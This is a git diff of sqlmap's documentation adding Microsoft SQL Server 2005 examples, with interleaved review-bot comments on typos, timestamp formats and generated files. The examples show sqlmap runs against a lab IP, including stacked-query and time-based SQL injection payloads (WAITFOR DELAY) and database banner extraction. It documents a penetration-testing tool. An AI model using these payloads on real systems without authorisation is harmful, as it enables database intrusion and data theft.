diff --git a/doc/ChangeLog b/doc/ChangeLog index ec03ff2f6..6d9271075 100644 --- a/doc/ChangeLog +++ b/doc/ChangeLog @@ -36,8 +36,7 @@ sqlmap (0.6.3-1) stable; urgency=low headers are set; * Minor improvement to be able to provide CU (as current user) as user value (-U) when enumerating users privileges or users passwords; - * Minor improvements to sqlmap Debian package files: sqlmap uploaded - to official Debian project repository, on queue at the moment; + * Minor improvements to sqlmap Debian package files; * Minor improvement to use Python psyco (http://psyco.sourceforge.net/) library if available to speed up the sqlmap algorithmic operations; * Minor improvement to retry the HTTP request up to three times in case diff --git a/doc/README.html b/doc/README.html index dc112907a..723fe96fe 100644 --- a/doc/README.html +++ b/doc/README.html @@ -1851,6 +1851,23 @@ stacked queries support: 'id=1; SELECT pg_sleep(5);-- AND 3128=3128'

+

Example on a Microsoft SQL Server 2005 Service Pack 0 target:

+

+

+
+$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" \
+  --stacked-test -v 1
+
+[...]
+back-end DBMS: Microsoft SQL Server 2005
+
+[hh:mm:09] [INFO] testing stacked queries support on parameter 'name'
+[hh:mm:23] [INFO] the web application supports stacked queries on parameter 'name'
+stacked queries support:    'name=luther'; WAITFOR DELAY '0:0:5';-- AND 'wRcBC'='wRcBC'
+
+
+

+

Test for Time based blind SQL injection

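Review bot: the timestamps in this example are placeholders ([hh:mm:09], [hh:mm:23]) while the time-based example added in the next hunk keeps real ones ([15:32:59]); pick one convention for all of the new Microsoft SQL Server 2005 examples. The placeholders also show 14 seconds between "testing stacked queries support" and the confirmation for a payload that delays only 5 seconds (WAITFOR DELAY '0:0:5'); if sqlmap issues the delayed request more than once, or measures a baseline first, one sentence saying so would keep readers from reading the gap as a problem with the target.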
@@ -1901,6 +1918,25 @@ time based blind sql injection payload: 'id=1; SELECT pg_sleep(5);-- AND 9644

+

Example on a Microsoft SQL Server 2005 Service Pack 0 target:

+

+

+
+$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" \
+  --time-test -v 1
+
+[...]
+back-end DBMS: Microsoft SQL Server 2005
+
+[15:32:59] [INFO] testing time based blind sql injection on parameter 'name' with AND condition syntax
+[15:32:59] [WARNING] the parameter 'name' is not affected by a time based blind sql injection with AND condition syntax
+[15:32:59] [INFO] testing time based blind sql injection on parameter 'name' with stacked query syntax
+[15:33:13] [INFO] the parameter 'name' is affected by a time based blind sql injection with stacked query syntax
+time based blind sql injection payload:    'name=luther'; WAITFOR DELAY '0:0:5';-- AND 'PmrXn'='PmrXn'
+
+
+

+

Test for UNION query SQL injection

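Review bot: the line "[WARNING] the parameter 'name' is not affected by a time based blind sql injection with AND condition syntax" is shown without explanation, and a reader coming from the PostgreSQL example just above (pg_sleep inside an AND condition) will wonder whether the test failed. A sentence noting that the Microsoft SQL Server delay primitive used here, WAITFOR DELAY, is a statement rather than an expression, so only the stacked query syntax can carry it, would make the two-step log self-explanatory. The real timestamps ([15:32:59], [15:33:13]) also differ from the [hh:mm:ss] placeholders used in the other new examples.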
@@ -2289,6 +2325,29 @@ back-end DBMS: active fingerprint: Microsoft SQL Server 2000

+

Example on a Microsoft SQL Server 2005 Service Pack 0 target:

+

+

+
+$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f
+
+[...]
+[hh:mm:51] [WARNING] the back-end DMBS is not PostgreSQL
+[hh:mm:51] [INFO] testing Microsoft SQL Server
+[hh:mm:51] [INFO] query: LTRIM(STR(LEN(0)))
+[hh:mm:51] [INFO] retrieved: 1
+[hh:mm:51] [INFO] performed 13 queries in 0 seconds
+[hh:mm:51] [INFO] query: SELECT SUBSTRING((@@VERSION), 25, 1)
+[hh:mm:51] [INFO] retrieved: 5
+[hh:mm:51] [INFO] performed 13 queries in 0 seconds
+web server operating system: Windows 2003 or 2000
+web application technology: ASP.NET, Microsoft IIS 6.0, ASP
+back-end DBMS: active fingerprint: Microsoft SQL Server 2005
+               html error message fingerprint: Microsoft SQL Server
+
+
+

+

If you want an even more accurate result, based also on banner parsing, you can also provide the -b or --banner option.

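Review bot: the captured log line "[hh:mm:51] [WARNING] the back-end DMBS is not PostgreSQL" carries a typo (DMBS for DBMS). If this is verbatim tool output, the misspelling lives in sqlmap's warning string and should be fixed there and the example re-captured, rather than silently corrected in the documentation; if the line was retyped, fix it here. Minor: the -f -b example in the next hunk closes with a trailing [...] and this one does not; make the two consistent so the reader knows whether the output was cut.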
@@ -2372,6 +2431,40 @@ back-end DBMS: active fingerprint: Microsoft SQL Server 2000

+

Example on a Microsoft SQL Server 2005 Service Pack 0 target:

+

+

+
+$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f -b
+
+[...]
+[hh:mm:03] [WARNING] the back-end DMBS is not PostgreSQL
+[hh:mm:03] [INFO] testing Microsoft SQL Server
+[hh:mm:03] [INFO] query: LTRIM(STR(LEN(8)))
+[hh:mm:03] [INFO] retrieved: 1
+[hh:mm:03] [INFO] performed 13 queries in 0 seconds
+[hh:mm:03] [INFO] query: SELECT SUBSTRING((@@VERSION), 25, 1)
+[hh:mm:03] [INFO] retrieved: 5
+[hh:mm:03] [INFO] performed 13 queries in 0 seconds
+[hh:mm:03] [INFO] query: @@VERSION
+[hh:mm:03] [INFO] retrieved: Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) 
+        Oct 14 2005 00:33:37 
+        Copyright (c) 1988-2005 Microsoft Corporation
+        Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
+
+[hh:mm:15] [INFO] performed 1343 queries in 11 seconds
+web server operating system: Windows 2003 or 2000
+web application technology: ASP.NET, Microsoft IIS 6.0, ASP
+back-end DBMS operating system: Windows 2003 Service Pack 1
+back-end DBMS: active fingerprint: Microsoft SQL Server 2005
+               banner parsing fingerprint: Microsoft SQL Server 2005 Service Pack 0 
+               version 9.00.1399
+               html error message fingerprint: Microsoft SQL Server
+[...]
+
+
+

+

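Review bot: the same "DMBS" typo appears in the WARNING line here ([hh:mm:03]); whichever fix is chosen for the -f example applies to this capture too. Worth a sentence in the prose that follows: the two operating system lines come from different sources and need not agree. "web server operating system: Windows 2003 or 2000" is a guess from the HTTP layer, while "back-end DBMS operating system: Windows 2003 Service Pack 1" is read out of the @@VERSION banner ("Windows NT 5.2 (Build 3790: Service Pack 1)"), is the more precise of the two, and describes the database host, which may not be the web server. The example also shows the price of -b over this injection: 13 queries for the single character of SUBSTRING((@@VERSION), 25, 1), and 1343 queries in 11 seconds for the whole banner; that is a useful number to state in the text.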
As you can see, from the Microsoft SQL Server banner, sqlmap was able to correctly identify the database management system patch level. The Microsoft SQL Server XML versions file is the result of a sqlmap @@ -2444,6 +2537,23 @@ Microsoft SQL Server 2000 - 8.00.194 (Intel X86)

+

Example on a Microsoft SQL Server 2005 Service Pack 0 target:

+

+

+
+$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 0 -b
+
+banner:
+---
+Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) 
+        Oct 14 2005 00:33:37 
+        Copyright (c) 1988-2005 Microsoft Corporation
+        Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
+---
+
+
+

+

Current user

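Review bot: the banner lines "Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) " and "Oct 14 2005 00:33:37 " are added with trailing whitespace, here and in the -f -b example above; it is invisible in the rendered HTML but git diff --check will flag it. Strip it before committing. This is also the third hunk in a row that pastes the identical 9.00.1399.06 banner; since the point of this example is the -v 0 output shape, the repetition is acceptable, but the introducing sentence could refer back to the -f -b run instead of presenting it as a fresh target.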
diff --git a/doc/README.pdf b/doc/README.pdf index c26709d42..7d6b45333 100644 Binary files a/doc/README.pdf and b/doc/README.pdf differ diff --git a/doc/README.sgml b/doc/README.sgml index fbb97d0e6..77042e507 100644 --- a/doc/README.sgml +++ b/doc/README.sgml @@ -1791,6 +1791,21 @@ back-end DBMS: PostgreSQL stacked queries support: 'id=1; SELECT pg_sleep(5);-- AND 3128=3128' +

+Example on a Microsoft SQL Server 2005 Service Pack 0 target: + + +$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" \ + --stacked-test -v 1 + +[...] +back-end DBMS: Microsoft SQL Server 2005 + +[hh:mm:09] [INFO] testing stacked queries support on parameter 'name' +[hh:mm:23] [INFO] the web application supports stacked queries on parameter 'name' +stacked queries support: 'name=luther'; WAITFOR DELAY '0:0:5';-- AND 'wRcBC'='wRcBC' + + Test for Time based blind SQL injection @@ -1839,6 +1854,23 @@ with stacked query syntax time based blind sql injection payload: 'id=1; SELECT pg_sleep(5);-- AND 9644=9644' +

+Example on a Microsoft SQL Server 2005 Service Pack 0 target: + + +$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" \ + --time-test -v 1 + +[...] +back-end DBMS: Microsoft SQL Server 2005 + +[15:32:59] [INFO] testing time based blind sql injection on parameter 'name' with AND condition syntax +[15:32:59] [WARNING] the parameter 'name' is not affected by a time based blind sql injection with AND condition syntax +[15:32:59] [INFO] testing time based blind sql injection on parameter 'name' with stacked query syntax +[15:33:13] [INFO] the parameter 'name' is affected by a time based blind sql injection with stacked query syntax +time based blind sql injection payload: 'name=luther'; WAITFOR DELAY '0:0:5';-- AND 'PmrXn'='PmrXn' + + Test for UNION query SQL injection @@ -2221,6 +2253,27 @@ back-end DBMS: active fingerprint: Microsoft SQL Server 2000 html error message fingerprint: Microsoft SQL Server +

+Example on a Microsoft SQL Server 2005 Service Pack 0 target: + + +$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f + +[...] +[hh:mm:51] [WARNING] the back-end DMBS is not PostgreSQL +[hh:mm:51] [INFO] testing Microsoft SQL Server +[hh:mm:51] [INFO] query: LTRIM(STR(LEN(0))) +[hh:mm:51] [INFO] retrieved: 1 +[hh:mm:51] [INFO] performed 13 queries in 0 seconds +[hh:mm:51] [INFO] query: SELECT SUBSTRING((@@VERSION), 25, 1) +[hh:mm:51] [INFO] retrieved: 5 +[hh:mm:51] [INFO] performed 13 queries in 0 seconds +web server operating system: Windows 2003 or 2000 +web application technology: ASP.NET, Microsoft IIS 6.0, ASP +back-end DBMS: active fingerprint: Microsoft SQL Server 2005 + html error message fingerprint: Microsoft SQL Server + +

If you want an even more accurate result, based also on banner parsing, you can also provide the -b or --banner option. @@ -2302,6 +2355,38 @@ back-end DBMS: active fingerprint: Microsoft SQL Server 2000 [...] +

+Example on a Microsoft SQL Server 2005 Service Pack 0 target: + + +$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f -b + +[...] +[hh:mm:03] [WARNING] the back-end DMBS is not PostgreSQL +[hh:mm:03] [INFO] testing Microsoft SQL Server +[hh:mm:03] [INFO] query: LTRIM(STR(LEN(8))) +[hh:mm:03] [INFO] retrieved: 1 +[hh:mm:03] [INFO] performed 13 queries in 0 seconds +[hh:mm:03] [INFO] query: SELECT SUBSTRING((@@VERSION), 25, 1) +[hh:mm:03] [INFO] retrieved: 5 +[hh:mm:03] [INFO] performed 13 queries in 0 seconds +[hh:mm:03] [INFO] query: @@VERSION +[hh:mm:03] [INFO] retrieved: Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) + Oct 14 2005 00:33:37 + Copyright (c) 1988-2005 Microsoft Corporation + Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1) + +[hh:mm:15] [INFO] performed 1343 queries in 11 seconds +web server operating system: Windows 2003 or 2000 +web application technology: ASP.NET, Microsoft IIS 6.0, ASP +back-end DBMS operating system: Windows 2003 Service Pack 1 +back-end DBMS: active fingerprint: Microsoft SQL Server 2005 + banner parsing fingerprint: Microsoft SQL Server 2005 Service Pack 0 + version 9.00.1399 + html error message fingerprint: Microsoft SQL Server +[...] + +

As you can see, from the Microsoft SQL Server banner, sqlmap was able to correctly identify the database management system patch level. @@ -2369,6 +2454,21 @@ Microsoft SQL Server 2000 - 8.00.194 (Intel X86) --- +

+Example on a Microsoft SQL Server 2005 Service Pack 0 target: + + +$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 0 -b + +banner: +--- +Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) + Oct 14 2005 00:33:37 + Copyright (c) 1988-2005 Microsoft Corporation + Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1) +--- + + Current user
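Review bot: the README.sgml hunks carry exactly the same examples as the README.html ones, so every point raised on the HTML hunks applies here: the "DMBS" typo in both fingerprint captures, the mix of [hh:mm:ss] placeholders and real [15:32:59] timestamps across the stacked and time-based examples, and the trailing whitespace on the banner lines. README.html and README.pdf change in lock-step with the sgml and appear to be generated from it (the PDF is committed as a binary blob, "Binary files a/doc/README.pdf and b/doc/README.pdf differ", and cannot be reviewed), so the sgml is the file to correct and the other two should be regenerated from it rather than hand-edited; otherwise the three copies drift. A regenerated PDF in every documentation commit also adds a full binary to the repository history each time, which is worth weighing against producing it only at release time.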